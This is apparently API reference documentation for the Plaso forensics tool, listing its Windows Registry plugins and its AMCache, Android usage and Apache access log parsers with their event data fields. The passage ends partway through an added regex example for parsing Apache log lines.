NAME = 'network_drives'
plaso.parsers.winreg_plugins.networks module
This file contains the NetworkList Registry plugin.
class plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Windows Registry plugin for parsing the NetworkList key.
DATA_FORMAT = 'Windows networks (NetworkList) Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'networks'
class plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventData
Bases: plaso.containers.events.EventData
Windows NetworkList event data.
connection_type (str): type of connection.
default_gateway_mac (str): MAC address for the default gateway.
description (str): description of the wireless connection.
dns_suffix (str): DNS suffix.
ssid (str): SSID of the connection.
DATA_TYPE = 'windows:registry:network'
plaso.parsers.winreg_plugins.officemru module
Windows Registry plugin for the Microsoft Office MRU.
class plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventData
Bases: plaso.containers.events.EventData
Microsoft Office MRU list Windows Registry event data.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:office_mru_list'
class plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plugin that parses Microsoft Office MRU keys.
DATA_FORMAT = 'Microsoft Office MRU Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'microsoft_office_mru'
class plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventData
Bases: plaso.containers.events.EventData
Microsoft Office MRU Windows Registry event data.
key_path (str): Windows Registry key path.
value_string (str): MRU value.
DATA_TYPE = 'windows:registry:office_mru'
plaso.parsers.winreg_plugins.outlook module
This file contains an Outlook search MRU Registry parser.
class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventData
Bases: plaso.containers.events.EventData
Outlook search MRU event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:outlook_search_mru'
class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin parsing Outlook Search MRU keys.
DATA_FORMAT = 'Microsoft Outlook search MRU Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'microsoft_outlook_mru'
plaso.parsers.winreg_plugins.programscache module
Windows Registry plugin to parse the Explorer ProgramsCache key.
class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventData
Bases: plaso.containers.events.EventData
Explorer ProgramsCache event data attribute container.
entries (str): entries in the program cache.
key_path (str): Windows Registry key path.
known_folder_identifier (str): known folder identifier.
value_name (str): Windows Registry value name.
DATA_TYPE = 'windows:registry:explorer:programcache'
class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Class that parses the Explorer ProgramsCache Registry data.
DATA_FORMAT = 'Windows Explorer Programs Cache Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'explorer_programscache'
plaso.parsers.winreg_plugins.run module
This file contains the Run/RunOnce key plugins for Plaso.
class plaso.parsers.winreg_plugins.run.AutoRunsPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing user specific auto runs.
Also see: http://msdn.microsoft.com/en-us/library/aa376977(v=vs.85).aspx
DATA_FORMAT = 'Run and run once Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_run'
class plaso.parsers.winreg_plugins.run.RunKeyEventData
Bases: plaso.containers.events.EventData
Run/RunOnce key event data attribute container.
entries (str): Run/RunOnce entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:run'
plaso.parsers.winreg_plugins.sam_users module
Windows Registry plugin for SAM Users Account information.
class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData
Bases: plaso.containers.events.EventData
Class that defines SAM users Windows Registry event data.
account_rid (int): account relative identifier (RID).
comments (str): comments.
fullname (str): full name.
key_path (str): Windows Registry key path.
login_count (int): login count.
username (str): username.
DATA_TYPE = 'windows:registry:sam_users'
class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Windows Registry plugin for SAM Users Account information.
DATA_FORMAT = 'Security Accounts Manager (SAM) users Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_sam_users'
plaso.parsers.winreg_plugins.services module
Windows drivers and services Registry key parser plugin.
class plaso.parsers.winreg_plugins.services.ServicesPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plug-in to format the Services and Drivers keys having Type and Start.
Also see: http://support.microsoft.com/kb/103000
DATA_FORMAT = 'Windows drivers and services Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter object>})
NAME = 'windows_services'
class plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData
Bases: plaso.containers.events.EventData
Windows Registry driver or service event data attribute container.
error_control (int): error control value of the Windows driver or service executable.
image_path (str): path of the Windows driver or service executable.
key_path (str): Windows Registry key path.
name (str): name of the Windows driver or service.
object_name (str): Windows service object name.
service_dll (str): Windows service DLL.
service_type (int): Windows driver or service type.
start_type (int): device or service start type.
values (str): names and data of additional values in the key.
DATA_TYPE = 'windows:registry:service'
plaso.parsers.winreg_plugins.shutdown module
Windows Registry plugin for parsing the last shutdown time of a system.
class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventData
Bases: plaso.containers.events.EventData
Shutdown Windows Registry event data.
key_path (str): Windows Registry key path.
value_name (str): name of the Windows Registry value.
DATA_TYPE = 'windows:registry:shutdown'
class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Windows Registry plugin for parsing the last shutdown time of a system.
DATA_FORMAT = 'Windows last shutdown Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a ShutdownTime Windows Registry value.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_shutdown'
plaso.parsers.winreg_plugins.task_scheduler module
This file contains the Task Scheduler Registry keys plugins.
class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventData
Bases: plaso.containers.events.EventData
Task Cache event data.
key_path (str): Windows Registry key path.
task_name (str): name of the task.
task_identifier (str): identifier of the task.
DATA_TYPE = 'task_scheduler:task_cache:entry'
class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Plugin that parses a Task Cache key.
DATA_FORMAT = 'Windows Task Scheduler cache Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_task_cache'
plaso.parsers.winreg_plugins.terminal_server module
This file contains the Terminal Server client Windows Registry plugins.
class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventData
Bases: plaso.containers.events.EventData
Terminal Server client connection event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
username (str): username, provided by the UsernameHint value.
DATA_TYPE = 'windows:registry:mstsc:connection'
class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventData
Bases: plaso.containers.events.EventData
Terminal Server client MRU event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:mstsc:mru'
class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for Terminal Server Client Connection MRU keys.
DATA_FORMAT = 'Terminal Server Client Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Terminal Server Client MRU Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mstsc_rdp_mru'
class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for Terminal Server Client Connection keys.
DATA_FORMAT = 'Terminal Server Client Connection Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Terminal Server Client Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mstsc_rdp'
plaso.parsers.winreg_plugins.timezone module
Plug-in to collect information about the Windows timezone settings.
class plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plug-in to collect information about the Windows timezone settings.
DATA_FORMAT = 'Windows time zone Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_timezone'
class plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventData
Bases: plaso.containers.events.EventData
Timezone settings event data attribute container.
configuration (str): timezone configuration.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:timezone'
plaso.parsers.winreg_plugins.typedurls module
File containing a Windows Registry plugin to parse the typed URLs key.
class plaso.parsers.winreg_plugins.typedurls.TypedURLsEventData
Bases: plaso.containers.events.EventData
Typed URLs event data attribute container.
entries (str): typed URL or path entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:typedurls'
class plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
A Windows Registry plugin for typed URLs history.
DATA_FORMAT = 'Windows Explorer typed URLs Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_typed_urls'
plaso.parsers.winreg_plugins.usb module
File containing a Windows Registry plugin to parse the USB Device key.
class plaso.parsers.winreg_plugins.usb.USBPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
USB Windows Registry plugin for last connection time.
Also see: https://msdn.microsoft.com/en-us/library/windows/hardware/jj649944%28v=vs.85%29.aspx
DATA_FORMAT = 'Windows USB device Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_usb_devices'
class plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData
Bases: plaso.containers.events.EventData
Windows USB device event data attribute container.
key_path (str): Windows Registry key path.
product (str): product of the USB device.
serial (str): serial number of the USB device.
subkey_name (str): name of the Windows Registry subkey.
vendor (str): vendor of the USB device.
DATA_TYPE = 'windows:registry:usb'
plaso.parsers.winreg_plugins.usbstor module
File containing a Windows Registry plugin to parse the USBStor key.
class plaso.parsers.winreg_plugins.usbstor.USBStorEventData
Bases: plaso.containers.events.EventData
USBStor event data attribute container.
device_type (str): type of USB device.
display_name (str): display name of the USB device.
key_path (str): Windows Registry key path.
parent_id_prefix (str): parent identifier prefix of the USB device.
product (str): product of the USB device.
serial (str): serial number of the USB device.
revision (str): revision number of the USB device.
subkey_name (str): name of the Windows Registry subkey.
vendor (str): vendor of the USB device.
DATA_TYPE = 'windows:registry:usbstor'
class plaso.parsers.winreg_plugins.usbstor.USBStorPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
USBStor key plugin.
Also see: https://forensicswiki.xyz/wiki/index.php?title=USB_History_Viewing
DATA_FORMAT = 'Windows USB Plug And Play Manager USBStor Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_usbstor_devices'
plaso.parsers.winreg_plugins.userassist module
The UserAssist Windows Registry plugin.
class plaso.parsers.winreg_plugins.userassist.UserAssistPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Plugin that parses an UserAssist key.
Also see: http://blog.didierstevens.com/programs/userassist/ https://code.google.com/p/winreg-kb/wiki/UserAssistKeys http://intotheboxes.files.wordpress.com/2010/04/intotheboxes_2010_q1.pdf
DATA_FORMAT = 'User Assist Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>})
NAME = 'userassist'
class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData
Bases: plaso.containers.events.EventData
UserAssist Windows Registry event data.
application_focus_count (int) – application focus count.
application_focus_duration (int) – application focus duration.
entry_index (int) – entry index.
key_path (str) – Windows Registry key path.
number_of_executions (int) – number of executions.
value_name (str) – name of the Windows Registry value.
DATA_TYPE = 'windows:registry:userassist'
class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter(user_assist_guid)
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter
UserAssist Windows Registry key path filter.
plaso.parsers.winreg_plugins.windows_version module
Plug-in to collect information about the Windows version.
class plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData
Bases: plaso.containers.events.EventData
Windows installation event data attribute container.
build_number (str) – Windows build number.
key_path (str) – Windows Registry key path.
owner (str) – registered owner.
product_name (str) – product name.
service_pack (str) – service pack.
version (str) – Windows version.
DATA_TYPE = 'windows:registry:installation'
class plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plug-in to collect information about the Windows version.
DATA_FORMAT = 'Windows version (product) Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_version'
plaso.parsers.winreg_plugins.winlogon module
This file contains the Winlogon Registry plugin.
class plaso.parsers.winreg_plugins.winlogon.WinlogonEventData
Bases: plaso.containers.events.EventData
Winlogon event data attribute container.
application (str) – Winlogon application.
command (str) – Winlogon command.
handler (str) – Winlogon handler.
key_path (str) – Windows Registry key path.
trigger (str) – Winlogon trigger.
DATA_TYPE = 'windows:registry:winlogon'
class plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing the Winlogon key.
DATA_FORMAT = 'Windows log-on Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'winlogon'
plaso.parsers.winreg_plugins.winrar module
This file contains a WinRAR history Windows Registry plugin.
class plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventData
Bases: plaso.containers.events.EventData
WinRAR history event data attribute container.
entries (str) – archive history entries.
key_path (str) – Windows Registry key path.
DATA_TYPE = 'winrar:history'
class plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing WinRAR History keys.
DATA_FORMAT = 'WinRAR History Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'winrar_mru'
Module contents
Imports for the Windows Registry parser.
Submodules
plaso.parsers.amcache module
File containing a Windows Registry plugin to parse the AMCache.hve file.
class plaso.parsers.amcache.AMCacheFileEventData
Bases: plaso.containers.events.EventData
AMCache file event data.
company_name (str) – company name that created the product the file belongs to.
file_description (str) – description of the file.
file_reference (str) – file system file reference, for example 9-1 (MFT entry - sequence number).
file_size (int) – size of the file in bytes.
file_version (str) – version of the file.
full_path (str) – full path of the file.
language_code (int) – language code of the file.
product_name (str) – product name the file belongs to.
program_identifier (str) – GUID of the entry under the Root/Program key the file belongs to.
sha1 (str) – SHA-1 of the file.
DATA_TYPE = 'windows:registry:amcache'
class plaso.parsers.amcache.AMCacheParser
Bases: plaso.parsers.interface.FileObjectParser
AMCache Registry plugin for recently run programs.
DATA_FORMAT = 'AMCache Windows NT Registry (AMCache.hve) file'
NAME = 'amcache'
ParseFileObject(parser_mediator, file_object)
Parses an AMCache.hve file-like object for events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
class plaso.parsers.amcache.AMCacheProgramEventData
Bases: plaso.containers.events.EventData
AMCache programs event data.
entry_type (str) – type of entry (usually AddRemoveProgram).
file_paths (str) – file paths of the installed program.
files (str) – list of files belonging to the program.
language_code (int) – language code of the program.
msi_package_code (str) – MSI package code of the program.
msi_product_code (str) – MSI product code of the program.
name (str) – name of the installed program.
package_code (str) – package code of the program.
product_code (str) – product code of the program.
publisher (str) – publisher of the program.
uninstall_key (str) – Unicode string of the uninstall Registry key of the program.
version (str) – version of the program.
DATA_TYPE = 'windows:registry:amcache:programs'
plaso.parsers.android_app_usage module
Parser for the Android usage history (usage-history.xml) files.
class plaso.parsers.android_app_usage.AndroidAppUsageEventData
Bases: plaso.containers.events.EventData
Android application usage event data.
package (str) – name of the Android application.
component (str) – name of the individual component of the application.
DATA_TYPE = 'android:event:last_resume_time'
class plaso.parsers.android_app_usage.AndroidAppUsageParser
Bases: plaso.parsers.interface.FileObjectParser
Parses the Android usage history (usage-history.xml) file.
DATA_FORMAT = 'Android usage history (usage-history.xml) file'
NAME = 'android_app_usage'
ParseFileObject(parser_mediator, file_object)
Parses an Android usage-history file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.apache_access module
Apache access log (access.log) file parser.
The parser is based on the two default Apache formats, the common and combined log formats defined in https://httpd.apache.org/docs/2.4/logs.html
class plaso.parsers.apache_access.ApacheAccessEventData
Bases: plaso.containers.events.EventData
Apache access event data.
http_request_referer (str) – HTTP request referer header information.
http_request (str) – first line of the HTTP request.
http_request_user_agent (str) – HTTP request user agent header information.
http_response_bytes (int) – HTTP response size in bytes, without headers.
http_response_code (int) – HTTP response code from the server.
ip_address (str) – IPv4 or IPv6 address.
port_number (int) – canonical port of the server serving the request.
remote_name (str) – remote logname (from identd, if supplied).
server_name (str) – canonical hostname of the server serving the request.
user_name (str) – logged user name.
DATA_TYPE = 'apache:access'
class plaso.parsers.apache_access.ApacheAccessParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Apache access log (access.log) file parser.
DATA_FORMAT = 'Apache access log (access.log) file'
LINE_STRUCTURES = [('combined_log_format', {{{{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd}), ('common_log_format', {{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} lineEnd}), ('vhost_combined_log_format', {{{{{{{{{{{{W:(ABCD...) Suppress:(":")} W:(0123...)} {IPv4 address | IPv6 address}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd})]
MAX_LINE_LENGTH = 2048
NAME = 'apache_access'
ParseRecord(parser_mediator, key, structure)
Parses a matching entry.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – elements parsed from the file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verifies that this is an Apache access log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
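The three line formats named in ApacheAccessParser.LINE_STRUCTURES above (common, combined and vhost_combined) can be recognised with plain regular expressions. The following is an added example, not Plaso's own code: it picks the matching format, extracts the ApacheAccessEventData fields from a line and converts the bracketed local timestamp to UTC, which is what makes web server events line up with other sources on a timeline. The sample lines are constructed for the example; the function and constant names are the example's own.

```python
"""Added example, not Plaso's own code: recognise the three Apache access log
formats named in ApacheAccessParser.LINE_STRUCTURES (common, combined and
vhost_combined), extract the ApacheAccessEventData fields from a line and
normalise the bracketed local timestamp to UTC. Sample lines are constructed."""
import re
from datetime import datetime, timezone

# Field patterns, one per ApacheAccessEventData attribute.
_HOST = r'(?P<ip_address>[0-9a-fA-F.:]+)'
_IDENT = r'(?P<remote_name>\S+)'
_USER = r'(?P<user_name>\S+)'
_TIME = r'\[(?P<time>[^\]]+)\]'
_REQUEST = r'"(?P<http_request>[^"]*)"'
_CODE = r'(?P<http_response_code>\d{3})'
_BYTES = r'(?P<http_response_bytes>-|\d+)'
_REFERER = r'"(?P<http_request_referer>[^"]*)"'
_USER_AGENT = r'"(?P<http_request_user_agent>[^"]*)"'
_VHOST = r'(?P<server_name>\S+):(?P<port_number>\d+)'

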